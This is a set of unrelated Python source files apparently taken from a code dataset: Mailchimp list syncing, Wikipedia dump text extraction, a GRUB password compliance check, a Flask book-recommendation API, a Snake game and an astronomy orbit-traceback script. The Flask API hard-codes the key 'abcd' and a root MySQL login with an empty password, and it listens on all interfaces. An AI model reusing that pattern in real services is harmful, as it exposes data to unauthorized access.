        enrolled_emails = set(enrolled.values_list('user__email', flat=True))
        non_enrolled_emails = list(subscribed.difference(enrolled_emails))
        unsubscribe(mailchimp, list_id, non_enrolled_emails)
        # Segment over the final membership (old subscribers + newly added).
        subscribed = subscribed.union({d['EMAIL'] for d in to_subscribe})
        make_segments(mailchimp, list_id, num_segments, subscribed)
def connect_mailchimp(api_key):
    """Create a MailSnake client for `api_key` and verify connectivity via ping."""
    client = MailSnake(api_key)
    log.debug(client.ping())
    return client
def verify_list(mailchimp, list_id, course_id):
    """
    Check that `list_id` names exactly one Mailchimp list whose name loosely
    matches `course_id` (at least three shared tokens).

    Returns boolean: whether or not course_id matches list_id
    """
    matches = mailchimp.lists(filters={'list_id': list_id})['data']
    if len(matches) != 1:
        log.error('incorrect list id')
        return False
    list_name = matches[0]['name']
    log.debug('list name: %s', list_name)
    # Compare the tokens of the course id against the list name.
    tokens = course_id.replace('_', ' ').replace('/', ' ').split()
    overlap = sum(1 for token in tokens if token in list_name)
    if overlap < 3:
        log.info(course_id)
        log.info(list_name)
        log.error('course_id does not match list name')
        return False
    return True
def get_student_data(students, exclude=None):
    """
    Given a QuerySet of Django users, build one dict per user with keys
    'EMAIL', 'FULLNAME' and 'EDX_ID', skipping any email in `exclude`.
    """
    # Only a couple of user fields are needed, so the query avoids fetching
    # full User objects; this namedtuple stands in for the User when
    # computing the anonymous id.
    FakeUser = namedtuple('Fake', 'id username is_anonymous')
    excluded_emails = exclude if exclude else set()
    fields = 'user__email', 'name', 'user_id', 'user__username'
    results = []
    for row in students.values(*fields):
        if row['user__email'] in excluded_emails:
            continue
        fake_user = FakeUser(row['user_id'], row['user__username'], lambda: True)
        results.append({
            'EMAIL': row['user__email'],
            'FULLNAME': row['name'].title(),
            'EDX_ID': unique_id_for_user(fake_user),
        })
    return results
def get_enrolled_students(course_id):
    """Return a QuerySet of UserProfiles actively enrolled in `course_id`."""
    course_key = CourseKey.from_string(course_id)
    return UserProfile.objects.filter(
        user__courseenrollment__course_id=course_key,
        user__courseenrollment__is_active=True,
    )
# Thin wrappers over get_members(), one per Mailchimp membership status.
def get_subscribed(mailchimp, list_id):
    """Returns the set of email addresses currently subscribed to `list_id`."""
    return get_members(mailchimp, list_id, 'subscribed')


def get_unsubscribed(mailchimp, list_id):
    """Returns the set of email addresses that have unsubscribed from `list_id`."""
    return get_members(mailchimp, list_id, 'unsubscribed')


def get_cleaned(mailchimp, list_id):
    """
    Returns a set of email addresses that have been cleaned from `list_id`
    These email addresses may be invalid or have caused bounces, so you don't want
    to re-add them back to the list.
    """
    return get_members(mailchimp, list_id, 'cleaned')
def get_members(mailchimp, list_id, status):
    """
    Page through the Mailchimp list and collect the email addresses of every
    member whose subscription state equals `status`.

    Returns a set of email addresses.
    """
    fetch_page = mailchimp.listMembers
    emails = set()
    page = 0
    while True:
        response = fetch_page(id=list_id,
                              status=status,
                              start=page,
                              limit=BATCH_SIZE)
        data = response.get('data', [])
        if not data:
            break
        emails.update(entry['email'] for entry in data)
        page += 1
    return emails
def unsubscribe(mailchimp, list_id, emails):
    """
    Batch-unsubscribe `emails` from `list_id`; members stay on the list
    (delete_member=False) and no goodbye mail is sent.
    """
    result = mailchimp.listBatchUnsubscribe(id=list_id,
                                            emails=emails,
                                            send_goodbye=False,
                                            delete_member=False)
    log.debug(result)
def update_merge_tags(mailchimp, list_id, tag_names):
    """
    This function is rather inscrutable. Given tag_names, which
    in this code seems to be a list of ['FULLNAME', 'EMAIL', 'EDX_ID'],
    we grab tags from the mailchimp list, then we verify tag_names has
    'FULLNAME' and 'EMAIL' present, we get more data from mailchimp, then
    sync the variables up to mailchimp using `listMergeVarAdd`.
    The purpose of this function is unclear.
    """
    mc_vars = mailchimp.listMergeVars(id=list_id)
    mc_names = {v['name'] for v in mc_vars}
    mc_merge = mailchimp.listMergeVarAdd
    tags = [v['tag'] for v in mc_vars]
    for name in tag_names:
        tag = name_to_tag(name)
        # verify FULLNAME is present
        # TODO: Why is this under the for loop? It does nothing with the loop
        # variable and seems like things would work if this was executed before or
        # after the loop.
        if 'FULLNAME' not in tags:
            # NOTE(review): '<NAME>' below looks like a redacted literal
            # (probably 'Full Name') -- confirm against upstream history.
            result = mc_merge(id=list_id,
                              tag='FULLNAME',
                              name='<NAME>',
                              options={'field_type': 'text',
                                       'public': False})
            tags.append('FULLNAME')
            log.debug(result)
        # add extra tags if not present
        if name not in mc_names and tag not in ['EMAIL', 'FULLNAME']:
            ftype = FIELD_TYPES.get(name, 'number')
            result = mc_merge(id=list_id,
                              tag=tag,
                              name=name,
                              options={'field_type': ftype,
                                       'public': False})
            tags.append(tag)
            log.debug(result)
def subscribe_with_data(mailchimp, list_id, user_data):
    """
    Batch-subscribe `user_data` (dicts keyed by 'EMAIL', 'FULLNAME',
    'EDX_ID') to `list_id`, converting each key to its merge-tag form first.

    Returns None
    """
    formatted = [{name_to_tag(key): value for key, value in entry.items()}
                 for entry in user_data]
    # Mailchimp times out on huge payloads, so send fixed-size batches.
    for batch in chunk(formatted, SUBSCRIBE_BATCH_SIZE):
        result = mailchimp.listBatchSubscribe(id=list_id,
                                              batch=batch,
                                              double_optin=False,
                                              update_existing=True)
        log.debug(
            "Added: %s Error on: %s", result['add_count'], result['error_count']
        )
def make_segments(mailchimp, list_id, count, emails):
    """
    Segments the list of email addresses `emails` into `count` segments,
    if count is nonzero.
    For unknown historical reasons, lost to the winds of time, this is done with
    a random order to the email addresses.
    First, existing 'random_' mailchimp segments are deleted.
    Then, the list of emails (the whole, large list) is shuffled.
    Finally, the shuffled emails are chunked into `count` segments and re-uploaded
    to mailchimp as 'random_'-prefixed segments.
    """
    if count > 0:
        # reset segments
        segments = mailchimp.listStaticSegments(id=list_id)
        for seg in segments:
            if seg['name'].startswith('random'):
                mailchimp.listStaticSegmentDel(id=list_id, seg_id=seg['id'])
        # shuffle and split emails
        emails = list(emails)
        random.shuffle(emails)  # Why do we do this?
        chunk_size = int(math.ceil(float(len(emails)) / count))
        # NOTE(review): when there are fewer emails than `count`, fewer than
        # `count` chunks exist and chunks[seg] below raises IndexError --
        # confirm callers never pass a segment count larger than the list.
        chunks = list(chunk(emails, chunk_size))
        # create segments and add emails
        for seg in range(count):
            name = f'random_{seg:002}'
            seg_id = mailchimp.listStaticSegmentAdd(id=list_id, name=name)
            for batch in chunk(chunks[seg], BATCH_SIZE):
                mailchimp.listStaticSegmentMembersAdd(
                    id=list_id,
                    seg_id=seg_id,
                    batch=batch
                )
def name_to_tag(name):
    """
    Return `name` shortened to at most 10 characters, with spaces turned
    into underscores and surrounding whitespace stripped.
    """
    shortened = name[:10] if len(name) > 10 else name
    return shortened.replace(' ', '_').strip()
def chunk(elist, size):
    """
    Generator. Yields successive slices of `elist` of length `size`; the
    final slice may be shorter than `size`.
    """
    slice_starts = range(0, len(elist), size)
    for start in slice_starts:
        yield elist[start:start + size]
| StarcoderdataPython |
3234540 | """
``$ articlequality extract_text -h``
::
Extracts text & metadata for labelings using XML dumps.
Usage:
extract_text <dump-file>... [--labelings=<path>] [--output=<path>]
[--threads=<num>] [--verbose]
extract_text -h | --help
Options:
-h --help Show this screen.
<dump-file> An XML dump file to process
--labelings=<name> The path to a file containing labeling events.
[default: <stdin>]
--output=<path> The path to a file to dump observations to
[default: <stdout>]
--threads=<num> If a collection of files are provided, how many
processor threads should be prepare?
[default: <cpu_count>]
--verbose Prints dots to <stderr>
"""
import logging
import os.path
import re
import sys
from itertools import groupby
from multiprocessing import cpu_count
import docopt
import mwtypes
import mwxml
from revscoring.utilities.util import dump_observation, read_observations
def main(argv=None):
    """Parse CLI args, group labelings by page title, and run extraction."""
    args = docopt.docopt(__doc__, argv=argv)
    dump_paths = args['<dump-file>']
    if args['--labelings'] == "<stdin>":
        labelings = read_observations(sys.stdin)
    else:
        path = os.path.expanduser(args['--labelings'])
        labelings = read_observations(open(path))
    # groupby only merges *adjacent* records, so this assumes the labelings
    # stream is already ordered by page_title -- TODO confirm upstream.
    grouped_labelings = groupby(labelings, key=lambda l: l['page_title'])
    # Materialize each lazy group immediately (groupby groups are consumed
    # as soon as the next group is requested) and sort it by timestamp.
    page_labelings = {title: sorted(list(labs), key=lambda l: l['timestamp'])
                      for title, labs in grouped_labelings}
    if args['--threads'] == "<cpu_count>":
        threads = cpu_count()
    else:
        threads = int(args['--threads'])
    if args['--output'] == "<stdout>":
        output = sys.stdout
    else:
        output = open(os.path.expanduser(args['--output']), "w")
    verbose = args['--verbose']
    run(dump_paths, page_labelings, output, threads, verbose=verbose)
def run(dump_paths, page_labelings, output, threads, verbose=False):
    """Process the dumps (stdin when no paths given) and write labelings out."""
    log_level = logging.DEBUG if verbose else logging.WARNING
    logging.basicConfig(
        level=log_level,
        format='%(asctime)s %(levelname)s:%(name)s -- %(message)s'
    )
    if dump_paths:
        # Fan out over the dump files with mwxml's multiprocessing map.
        labelings = mwxml.map(lambda d, p:
                              extract_text(d, page_labelings, verbose),
                              dump_paths, threads=threads)
    else:
        # No files supplied: read a single XML dump from stdin.
        labelings = extract_text(mwxml.Dump.from_file(sys.stdin),
                                 page_labelings, verbose=verbose)
    for labeling in labelings:
        dump_observation(labeling, output)
def extract_text(dump, page_labelings, verbose=False):
    """
    Extracts article text and metadata for labelings from an XML dump.
    :Parameters:
        dump : :class:`mwxml.Dump`
            The XML dump file to extract text & metadata from
        page_labelings : `dict`
            Labeling events keyed by page title; each value is a list
            sorted by timestamp ascending
        verbose : `bool`
            Print dots and stuff
    :Returns:
        An `iterator` of labelings augmented with 'page_id', 'rev_id' and
        'text'. Note that labelings of articles that can't be looked up will
        not be included.
    """
    for page in dump:
        if page.namespace == 0 and page.title in page_labelings:
            if verbose:
                sys.stderr.write("\n{0}: ".format(page.title))
                sys.stderr.flush()
            labelings = page_labelings[page.title]
            last_revision = None
            for revision in page:
                # Emit every labeling whose timestamp precedes this revision,
                # pairing it with the last usable revision seen before it.
                while last_revision is not None and \
                      len(labelings) > 0 and \
                      revision.timestamp > \
                      mwtypes.Timestamp(labelings[0]['timestamp']):
                    # Bug fix: the loop guard above inspects the *earliest*
                    # labeling (index 0; the list is sorted by timestamp), but
                    # the original code removed the *latest* with pop().
                    # Pop the element that was actually tested.
                    labeling = labelings.pop(0)
                    labeling['page_id'] = page.id
                    labeling['rev_id'] = last_revision.id
                    if not_an_article(last_revision.text):
                        labeling['text'] = None
                    else:
                        labeling['text'] = last_revision.text
                    yield labeling
                    if verbose:
                        sys.stderr.write("t")
                        sys.stderr.flush()
                # Don't update last_revision if the text was deleted
                if revision.text is not None:
                    last_revision = revision
# Case-insensitive marker for redirect stubs.
REDIRECT_RE = re.compile("#redirect", re.I)


def not_an_article(text):
    """Truthy when `text` is absent, shorter than 50 chars, or a redirect."""
    if text is None:
        return True
    return len(text) < 50 or REDIRECT_RE.match(text)
| StarcoderdataPython |
5076950 | from scanner.const import os
from scanner.types import BaseContol, is_item_detected
from scanner.transports import get_transport
class Control(BaseContol, control_number=7):
    """Report compliance when a boot-loader password directive is configured."""

    # Candidate GRUB/GRUB2 configuration locations; only readable ones are used.
    file_paths = (
        '/boot/grub/menu.lst',
        '/boot/grub2/menu.lst',
        '/boot/grub/grub.cfg',
        '/boot/grub2/grub.cfg',
        '/boot/grub/grub.conf',
        '/boot/grub2/grub.conf',
        '/etc/grub.conf'
    )
    # Line prefixes that count as a password directive.
    # NOTE(review): 'set <PASSWORD>' looks like a redacted literal (likely
    # 'set superusers' or a password_pbkdf2 form) -- confirm upstream.
    password_strings = (
        'set <PASSWORD>',
        'password'
    )

    def prerequisite(self):
        # This control is only meaningful on Linux hosts.
        return is_item_detected(os.LINUX)

    def check(self):
        """Scan every readable boot config for password directives."""
        transport = get_transport('unix')
        boot_configs = {}
        for file in self.file_paths:
            result = transport.get_file_content(file)
            if result.ExitStatus != 0:
                # File missing or unreadable on this host; skip it.
                continue
            boot_configs[file] = result.Output
        if not boot_configs:
            # No boot-loader configuration found at all.
            self.control.not_applicable()
        is_compliance = False
        results = []
        for file_name, content in boot_configs.items():
            if not content:
                continue
            # Collect "file:line-number:line" for each matching directive.
            lines = [
                f'{file_name}:{number}:{line}'
                for number, line in enumerate(
                    map(str.strip, content.splitlines()),
                    1
                )
                if line.startswith(self.password_strings)
            ]
            if not lines:
                continue
            results.extend(lines)
            is_compliance = True
        result = '\n'.join(results)
        if is_compliance:
            self.control.compliance(
                result=result
            )
        else:
            self.control.not_compliance(
                result='The password is not set up'
            )
| StarcoderdataPython |
5101323 | <reponame>marvinhere/bookrecommendation
import flask
from sqlalchemy import create_engine
import pandas as pd
import numpy as np
#import operator
import mysql.connector as sql
from flask import request, jsonify, abort
#from operations import *
import joblib
import json
import array as arr
import random
import sys
import recommendations as recommend
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.metrics.pairwise import cosine_similarity
# Flask application serving the book-recommendation API; debug disabled.
app = flask.Flask(__name__)
app.config["DEBUG"] = False
# Create some test data for our catalog in the form of a list of dictionaries.
@app.route('/', methods=['GET'])
def home():
    # Landing page: a static HTML snippet.
    return '''<h1>Distant Reading Archive</h1>
<p></p>'''
# A route to return all of the available entries in our catalog.
@app.route('/api/v1/resources/books/all', methods=['GET'])
def api_all():
    # NOTE(review): `books` is not defined anywhere in this file, so this
    # endpoint raises NameError at request time -- confirm where the
    # catalog data is supposed to come from before shipping.
    return jsonify(books)
@app.route('/transform-cover',methods=['GET'])
def api():
    """
    Rebuild the cover-based feature vectors for every book and persist them
    (vector-cover.pkl / ids.pkl) for later recommendation queries.

    Query params: apikey (shared secret). Returns the book-id mapping as
    JSON on success, ["Error"] otherwise.
    """
    apikey = request.args.get('apikey')
    # api password
    # NOTE(review): hard-coded API key and DB credentials belong in config.
    if apikey != 'abcd':
        return jsonify(['Error'])
    MYSQL_USER = 'root'
    MYSQL_PASSWORD = ''
    MYSQL_HOST_IP = '127.0.0.1'
    MYSQL_PORT = '3306'
    MYSQL_DATABASE = 'srlbcr'
    engine = create_engine('mysql+mysqlconnector://'+MYSQL_USER+':'+MYSQL_PASSWORD+'@'+MYSQL_HOST_IP+':'+MYSQL_PORT+'/'+MYSQL_DATABASE, echo=False)
    dbConnection = engine.connect()
    try:
        df = pd.read_sql("SELECT books.id, books.title,books.summary, GROUP_CONCAT(DISTINCT genres.genre SEPARATOR ' ') as genres, GROUP_CONCAT(DISTINCT c_designs.name SEPARATOR ' ') as covers FROM books INNER JOIN book_genres ON book_genres.book_id = books.id INNER JOIN genres ON book_genres.genre_id=genres.id INNER JOIN book_covers ON books.id=book_covers.book_id INNER JOIN c_designs ON book_covers.design_id=c_designs.id GROUP BY books.id", dbConnection)
    finally:
        # Bug fix: the connection was opened but never released.
        dbConnection.close()
    df['cover'] = recommend.getImportantFeatures(df)
    data = recommend.dataVectorized(df['cover'])
    # Renamed from `list`, which shadowed the builtin.
    book_ids = df[['id']].to_dict()
    joblib.dump(data, "vector-cover.pkl")
    joblib.dump(book_ids['id'], "ids.pkl")
    return jsonify(book_ids["id"])
@app.route('/recommendation-cover',methods=['GET'])
def recommendations():
    """
    Return the top-k cover-based recommendations for the book id in `data`.

    Query params: apikey (shared secret), data (book id to analyse),
    k (number of recommendations).
    """
    apikey = request.args.get('apikey')
    data_test_id = request.args.get('data')  # id of the book to analyse
    k = request.args.get('k')
    if apikey != 'abcd':
        # Bug fix: falling off the end returned None, which Flask turns
        # into a 500. Mirror the ['Error'] payload of the other endpoints.
        return jsonify(['Error'])
    # Feature vectors and matching book-id index built by /transform-cover.
    train_data = joblib.load("vector-cover.pkl")
    ids_data = joblib.load("ids.pkl")
    recom = recommend.getRecommendations(ids_data, train_data, data_test_id, int(k))
    return jsonify(recom)
@app.route('/recommendation-summary',methods=['GET'])
def recomsummary():
    """
    Return the top-k summary-based recommendations for the book id in
    `data`; respond 404 when no id is supplied ('none').
    """
    apikey = request.args.get('apikey')
    data_test_id = request.args.get('data')
    k = request.args.get('k')
    if apikey != 'abcd':
        # Bug fix: an unauthorized request previously returned None (HTTP 500).
        return jsonify(['Error'])
    if data_test_id == 'none':
        # Requires `abort` from flask; it was used here without being
        # imported, which raised NameError instead of returning 404.
        abort(404)
    vectorizer = joblib.load("vector-summary.pkl")
    ids_data = joblib.load("ids.pkl")
    recom = recommend.getRecommendations(ids_data, vectorizer, data_test_id, int(k))
    return jsonify(recom)
@app.route('/transform-summary',methods=['GET'])
def apisummary():
    """
    Rebuild the summary-based feature vectors for every book and persist
    them to vector-summary.pkl. Returns ["Ok"] on success, ["Error"] on a
    bad api key.
    """
    apikey = request.args.get('apikey')
    if apikey != 'abcd':
        return jsonify(['Error'])
    MYSQL_USER = 'root'
    MYSQL_PASSWORD = ''
    MYSQL_HOST_IP = '127.0.0.1'
    MYSQL_PORT = '3306'
    MYSQL_DATABASE = 'srlbcr'
    engine = create_engine('mysql+mysqlconnector://'+MYSQL_USER+':'+MYSQL_PASSWORD+'@'+MYSQL_HOST_IP+':'+MYSQL_PORT+'/'+MYSQL_DATABASE, echo=False)
    dbConnection = engine.connect()
    try:
        df = pd.read_sql("SELECT books.id, books.title,books.summary FROM books", dbConnection)
    finally:
        # Bug fix: the connection was opened but never released.
        dbConnection.close()
    # Spanish stop words ignored by the summary vectorizer.
    stop_words = frozenset(["a", "ante", "bajo", "con", "de", "desde", "durante", "hacia", "hasta", "por", "para"])
    data = recommend.dataVectorizedSummary(df['summary'], stop_words)
    joblib.dump(data, "vector-summary.pkl")
    return jsonify(['Ok'])
# Listen on all interfaces; debug mode was disabled in app.config above.
app.run(host='0.0.0.0', port=5000)
| StarcoderdataPython |
5034652 | <reponame>BrenoNAlmeida/free-python-games
"""Snake, classic arcade game.
Exercises
1. How do you make the snake faster or slower?
2. How can you make the snake go around the edges?
3. How would you move the food?
4. Change the snake to respond to arrow keys.
1. Como você deixa a cobra mais rápida ou mais lenta? FEITO
2. Como você pode fazer a cobra contornar as bordas?
3. Como você moveria a comida?
4. Mude a cobra para responder às teclas de seta FEITO
"""
from turtle import *
from random import randrange
from freegames import square, vector
food = vector(0, 0)  # initial food position
snake = [vector(10, 0)]  # initial snake body (list of segment positions)
aim = vector(0,-10)  # current movement direction (one cell per tick)
def change(x, y):
    "Change snake direction."
    aim.x, aim.y = x, y
def inside(head):
    "Return True if head inside boundaries."
    x_ok = -200 < head.x < 190
    y_ok = -200 < head.y < 190
    return x_ok and y_ok
def move():
    "Move snake forward one segment."
    # Advance by cloning the current head and shifting it one step in the
    # direction of the shared ``aim`` vector.
    head = snake[-1].copy()
    head.move(aim)
    if not inside(head) or head in snake:  # wall hit or self-collision: game over
        square(head.x, head.y, 9, 'red')  # mark the crash site with a red square
        update()
        return
    snake.append(head)  # grow the body one segment toward ``aim``
    if head == food:
        print('Snake:', len(snake))
        # Respawn the food at a random board cell (multiples of 10).
        food.x = randrange(-15, 15) * 10  # new food X within the board
        food.y = randrange(-15, 15) * 10  # new food Y within the board
    else:
        snake.pop(0)  # nothing eaten: drop the tail so the length stays constant
    clear()
    # Redraw every body segment of the snake.
    for body in snake:
        square(body.x, body.y, 9, 'black')
    # Draw the food.
    square(food.x, food.y, 9, 'green')
    update()
    ontimer(move, 100)  # schedule the next step in 100 ms (controls snake speed)
# Game setup: 420x420 window positioned at screen offset (370, 0).
setup(420, 420, 370, 0)
hideturtle()
tracer(False)  # disable auto-redraw; frames are flushed manually via update()
listen()
# Steer the snake with the arrow keys.
onkey(lambda: change(10, 0), 'Right')
onkey(lambda: change(-10, 0), 'Left')
onkey(lambda: change(0, 10), 'Up')
onkey(lambda: change(0, -10), 'Down')
move()  # kick off the self-rescheduling game loop
done()
11242780 | <reponame>astromark/lacewing
import numpy as np
#from mpl_toolkits.mplot3d import Axes3D
from matplotlib import pyplot
#from matplotlib import cm
from matplotlib.patches import Ellipse
from matplotlib.patches import Polygon
from matplotlib import patches
from matplotlib import _png
import kinematics
import ellipse
import astrometry
import lacewing
import sys
from astropy.io import ascii
# Normally, matplotlib just builds up a list of plot elements until you
# call savefig(), when it renders them all at once. That uses a LOT
# of memory. This function replaces savefig() with something that plots
# every element as it comes in.
def save(fig, filename):
    """Write the figure's already-rendered canvas straight to *filename*.

    Works around 'fig.canvas.print_png' (and friends) calling 'draw', which
    would re-render every plot element at once and use a lot of memory.

    Arguments:
        fig: a matplotlib Figure whose canvas has already been rendered
             (fig.canvas.draw() must have been called).
        filename: output PNG path.
    """
    renderer = fig.canvas.renderer
    # BUG FIX: PNG is binary data — open in 'wb', not 'w'. Text mode would
    # corrupt the stream via newline translation on Windows.
    with open(filename, 'wb') as outfile:
        _png.write_png(renderer._renderer, outfile, fig.dpi)
def traceback(argv=None):
    """Trace moving-group member stars back in time and plot the result.

    Positional command-line arguments (argv[1:]):
        inputfile  -- CSV of candidate members, read via lacewing.csv_loader
        group      -- moving-group name (spaces are replaced by underscores)
        method     -- 'ballistic', 'epicyclic', or 'potential'
        minage/maxage -- group age range (Myr; sign is forced negative)
        maxplotage -- x-axis span of the output plot (Myr)
        maxsimage  -- total simulated timespan (Myr)

    Side effects: writes "Moving_Group_<name>_<method>.dat" (fitted ellipse
    parameters per timestep) and "Trace_<name>_<method>.png" (the waterfall
    diagram).  NOTE: Python 2 code (print statements, xrange).
    """
    if argv is None:
        argv = sys.argv
    mgpname = argv[2]
    method = argv[3]
    #If user gives positive values for ages assume they meant to give negative values
    mgpage = -1*np.abs(np.float(argv[4]))
    mgpage2 = -1*np.abs(np.float(argv[5]))
    timespan = -1*np.abs(np.float(argv[6]))
    timestep = -0.1  # Myr per step; negative because we integrate backwards
    n_int = int(1000)  # number of Monte Carlo iterations per star
    full_timespan = -1*np.abs(np.float(argv[7])) #-800
    name,coord,era,edec,pmra,epmra,pmdec,epmdec,rv,erv,plx,eplx,note = lacewing.csv_loader(argv[1])
    # How many stars are we fitting?  Only stars with a complete kinematic
    # solution (proper motion, parallax AND radial velocity) are usable.
    good_stars = [x for x in xrange(len(coord)) if ((pmra[x] is not None) & (pmdec[x] is not None) & (plx[x] is not None) & (rv[x] is not None))]
    n_stars = len(good_stars)
    print 'Number of stars in solution: {0:}'.format(n_stars)
    # it saves time and memory to make arrays in advance, even in python
    # Set dtype=np.float32 to save memory
    mgp_x = np.zeros((n_stars,n_int,np.int(np.ceil(full_timespan/timestep))),dtype=np.float32)
    mgp_y = np.zeros((n_stars,n_int,np.int(np.ceil(full_timespan/timestep))),dtype=np.float32)
    mgp_z = np.zeros((n_stars,n_int,np.int(np.ceil(full_timespan/timestep))),dtype=np.float32)
    # These are for the 3D movie version
    mgp_size = []
    #mgp_color = []
    mgp_n = []
    n = 0
    print " # Name RA DEC Dist. pmRA pmDEC RV"
    for i in good_stars:
        print '({0:2d}) {1:16} {2:08.4f} {3:+07.4f} {4:6.2f} {5:+.4f} {6:+.4f} {7:+6.2f}'.format(i,name[i],coord[i].ra.degree,coord[i].dec.degree,1/plx[i],pmra[i],pmdec[i],rv[i])
        ###############################################################
        ### We now have the particulars about one star. We are now  ###
        ### going to run I monte carlo iterations through the       ###
        ### specified traceback method. The traceback is going to   ###
        ### compute UVW points and run them back in time. We could  ###
        ### then fit an ellipse to this star and save only the      ###
        ### ellipse parameters, but then information would be lost  ###
        ### (or need to be re-created) when we want to determine    ###
        ### the shape of the moving group itself. Instead, we'll    ###
        ### save and use every single monte carlo iteration.        ###
        ###############################################################
        if method == 'ballistic':
            px,py,pz = kinematics.ballistic(coord[i].ra.degree,era[i],coord[i].dec.degree,edec[i],1/plx[i],eplx[i]/(plx[i]**2),pmra[i],epmra[i],pmdec[i],epmdec[i],rv[i],erv[i],full_timespan,timestep,n_int)
        elif method == 'epicyclic':
            px,py,pz = kinematics.epicyclic(coord[i].ra.degree,era[i],coord[i].dec.degree,edec[i],1/plx[i],eplx[i]/(plx[i]**2),pmra[i],epmra[i],pmdec[i],epmdec[i],rv[i],erv[i],full_timespan,timestep,n_int)
        elif method == 'potential':
            px,py,pz = kinematics.potential(coord[i].ra.degree,era[i],coord[i].dec.degree,edec[i],1/plx[i],eplx[i]/(plx[i]**2),pmra[i],epmra[i],pmdec[i],epmdec[i],rv[i],erv[i],full_timespan,timestep,n_int)
        # store these iterations
        mgp_x[n] = px
        mgp_y[n] = py
        mgp_z[n] = pz
        mgp_n.append(name[i])
        #mgp_color.extend([color]*n_int)
        n = n+1
    # remove spaces from name - helps with programming later on
    mgpname = mgpname.replace(' ', '_')
    ################################################
    ### At this point in the program, we have    ###
    ### an NxIxT grid of positions constituting  ###
    ### the positions of I iterations of N stars ###
    ### at T times. Now we must fit ellipses to  ###
    ### those values at every time T.            ###
    ################################################
    # AR 2014.0319: Based on an idea from <NAME>, rather than calculating the full tracebacks of n*1000 stars over X Myr, I'm going to calculate 1000 tracebacks of n stars over X Myr.
    mgp_x = np.asarray(mgp_x,dtype=np.float32)
    mgp_y = np.asarray(mgp_y,dtype=np.float32)
    mgp_z = np.asarray(mgp_z,dtype=np.float32)
    times = np.arange(0,full_timespan,timestep)
    ## output positions of individual stars as a function of time.
    #for s in range(len(times)):
    #    outfile = open("mgp_{0:}_{1:}_{2:}.csv".format(mgpname,method,times[s]),"wb")
    #    outfile.write("Name,X,Y,Z,A,B,C,XY,XZ,YZ\n")
    #    for t in range(len(mgp_x)):
    #        obj = ellipse.fitellipse(mgp_x[t,:,s],mgp_y[t,:,s],mgp_z[t,:,s])
    #
    #        outfile.write("{0:}, {1: 12.8f}, {2: 12.8f}, {3: 12.8f}, {4: 12.8f}, {5: 12.8f}, {6: 12.8f}, {7: 12.8f}, {8: 12.8f}, {9: 12.8f}\n".format(mgp_n[t],obj['x'],obj['y'],obj['z'],obj['a'],obj['b'],obj['c'],obj['xy'],obj['xz'],obj['yz']))
    #    outfile.close()
    mgpmaster = []
    outfile = open("Moving_Group_{0:}_{1:}.dat".format(mgpname,method),"wb")
    outfile.write("Time X eX Y eY Z eZ A eA B eB C eC XY eXY XZ eXZ YZ eYZ\n")
    print('Tracing back the stellar orbits...')
    for k in xrange(len(times)):
        objlist = []
        for j in xrange(n_int):
            # this is one ellipse per monte carlo iteration
            obj = ellipse.fitellipse(mgp_x[:,j,k],mgp_y[:,j,k],mgp_z[:,j,k])
            objlist.append(obj)
        # Mean and standard deviation of each ellipse parameter over the
        # n_int Monte Carlo fits at this timestep.
        x = np.mean([objlist[m]['x'] for m in range(n_int)])
        y = np.mean([objlist[m]['y'] for m in range(n_int)])
        z = np.mean([objlist[m]['z'] for m in range(n_int)])
        xy = np.mean([objlist[m]['xy'] for m in range(n_int)])
        xz = np.mean([objlist[m]['xz'] for m in range(n_int)])
        yz= np.mean([objlist[m]['yz'] for m in range(n_int)])
        a = np.mean([objlist[m]['a'] for m in range(n_int)])
        b = np.mean([objlist[m]['b'] for m in range(n_int)])
        c = np.mean([objlist[m]['c'] for m in range(n_int)])
        ex = np.std([objlist[m]['x'] for m in range(n_int)],ddof=1)
        ey = np.std([objlist[m]['y'] for m in range(n_int)],ddof=1)
        ez = np.std([objlist[m]['z'] for m in range(n_int)],ddof=1)
        exy = np.std([objlist[m]['xy'] for m in range(n_int)],ddof=1)
        exz = np.std([objlist[m]['xz'] for m in range(n_int)],ddof=1)
        eyz= np.std([objlist[m]['yz'] for m in range(n_int)],ddof=1)
        ea = np.std([objlist[m]['a'] for m in range(n_int)],ddof=1)
        eb = np.std([objlist[m]['b'] for m in range(n_int)],ddof=1)
        ec = np.std([objlist[m]['c'] for m in range(n_int)],ddof=1)
        # We're re-saving a dictionary of one ellipse per TIMESTEP so that we can make a 3D plot of it later.
        mgpmaster.append({'x':x,'ex':ex,'y':y,'ey':ey,'z':z,'ez':ez,'xy':xy,'exy':exy,'xz':xz,'exz':exz,'yz':yz,'eyz':eyz,'a':a,'ea':ea,'b':b,'eb':eb,'c':c,'ec':ec})
        #Output all the particulars of the moving group at this timestep T.
        outfile.write("{0:8.1f} {1:12.3f} {2:12.3f} {3:12.3f} {4:12.3f} {5:12.3f} {6:12.3f} {7:12.4f} {8:12.4f} {9:12.4f} {10:12.4f} {11:12.4f} {12:12.4f} {13:12.4f} {14:12.4f} {15:12.4f} {16:12.4f} {17:12.4f} {18:12.4f}\n".format(times[k],mgpmaster[k]['x'],mgpmaster[k]['ex'],mgpmaster[k]['y'],mgpmaster[k]['ey'],mgpmaster[k]['z'],mgpmaster[k]['ez'],mgpmaster[k]['a'],mgpmaster[k]['ea'],mgpmaster[k]['b'],mgpmaster[k]['eb'],mgpmaster[k]['c'],mgpmaster[k]['ec'],mgpmaster[k]['xy'],mgpmaster[k]['exy'],mgpmaster[k]['xz'],mgpmaster[k]['exz'],mgpmaster[k]['yz'],mgpmaster[k]['eyz']))
        #Progress report every 1 Myr
        if (times[k]%1)==0: print('Stars traced back to '+str(times[k])+' Myr')
    outfile.close()
    #####################################################
    ### Flatten everything! Now we can plot all our   ###
    ### iterations at once (for the waterfall diagram ###
    ### and the 3D explosion plot)                    ###
    #####################################################
    # flatten by one dimension; we now have N*I stars at every time T.
    mgp_x = np.reshape(mgp_x,(n_stars*n_int,int(np.ceil(full_timespan/timestep))))
    mgp_y = np.reshape(mgp_y,(n_stars*n_int,int(np.ceil(full_timespan/timestep))))
    mgp_z = np.reshape(mgp_z,(n_stars*n_int,int(np.ceil(full_timespan/timestep))))
    ## rotate so that each strip contains n_stars*n_int elements for a given time.
    ## (it's easier to plot)
    #mgp_x = np.rot90(mgp_x,3)
    #mgp_y = np.rot90(mgp_y,3)
    #mgp_z = np.rot90(mgp_z,3)
    #times = np.rot90([times],3)
    #mgp_color = np.reshape(mgp_color,-1)
    #######################################################
    ### Draw a traceback plot of all N*I stars relative ###
    ### to their computed center, to show the behavior  ###
